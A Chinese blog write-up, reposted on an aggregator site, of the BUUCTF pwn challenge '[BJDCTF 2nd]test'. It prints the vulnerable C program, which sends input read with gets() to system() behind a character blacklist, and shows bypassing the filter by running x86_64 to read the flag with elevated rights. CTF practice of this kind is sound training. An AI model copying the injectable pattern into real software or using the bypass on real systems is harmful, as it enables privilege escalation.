CTF-Pwn-[BJDCTF 2nd]test

   日期:2020-05-07     浏览:104    评论:0    
核心提示:CTF-Pwn-[BJDCTF 2nd]test博客说明文章所涉及的资料来自互联网整理和个人总结,意运维

CTF-Pwn-[BJDCTF 2nd]test

博客说明

文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!

CTP平台

网址

https://buuoj.cn/challenges

题目

Pwn类,[BJDCTF 2nd]test

这个题目需要使用ssh连接

Username: ctf Password: test

思路

远程连接
ssh -p 25431 ctf@node3.buuoj.cn

查看文件

发现没有权限查看flag,那么我们要做的就是使用test.c文件来提升权限啦

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(){
    char cmd[0x100] = {0};
    puts("Welcome to Pwn-Game by TaQini.");
    puts("Your ID:");
    system("id");
    printf("$ ");
    gets(cmd);
    if( strstr(cmd, "n")
       ||strstr(cmd, "e")
       ||strstr(cmd, "p")
       ||strstr(cmd, "b")
       ||strstr(cmd, "u")
       ||strstr(cmd, "s")
       ||strstr(cmd, "h")
       ||strstr(cmd, "i")
       ||strstr(cmd, "f")
       ||strstr(cmd, "l")
       ||strstr(cmd, "a")
       ||strstr(cmd, "g")
       ||strstr(cmd, "|")
       ||strstr(cmd, "/")
       ||strstr(cmd, "$")
       ||strstr(cmd, "`")
       ||strstr(cmd, "-")
       ||strstr(cmd, "<")
       ||strstr(cmd, ">")
       ||strstr(cmd, ".")){
        exit(0);    
    }else{
        system(cmd);
    }
    return 0;
}

题目大概的意思是运行test,输入一个命令,这个时候的权限可以读取flag

test.c过滤了很多命令,取下的过滤规则是 "n|e|p|b|u|s|h|i|f|l|a|g",查看剩下可以使用的命令

ls /usr/bin/ /bin/ | grep -v -E "n|e|p|b|u|s|h|i|f|l|a|g"

测试

执行test,输入x86_64,然后cat flag

flag就找到了

感谢

BUUCTF

以及勤劳的自己

 
打赏
 本文转载自:网络 
所有权利归属于原作者,如文章来源标示错误或侵犯了您的权利请联系微信13520258486
更多>最近资讯中心
更多>最新资讯中心
0相关评论

推荐图文
推荐资讯中心
点击排行
最新信息
新手指南
采购商服务
供应商服务
交易安全
关注我们
手机网站:
新浪微博:
微信关注:

13520258486

周一至周五 9:00-18:00
(其他时间联系在线客服)

24小时在线客服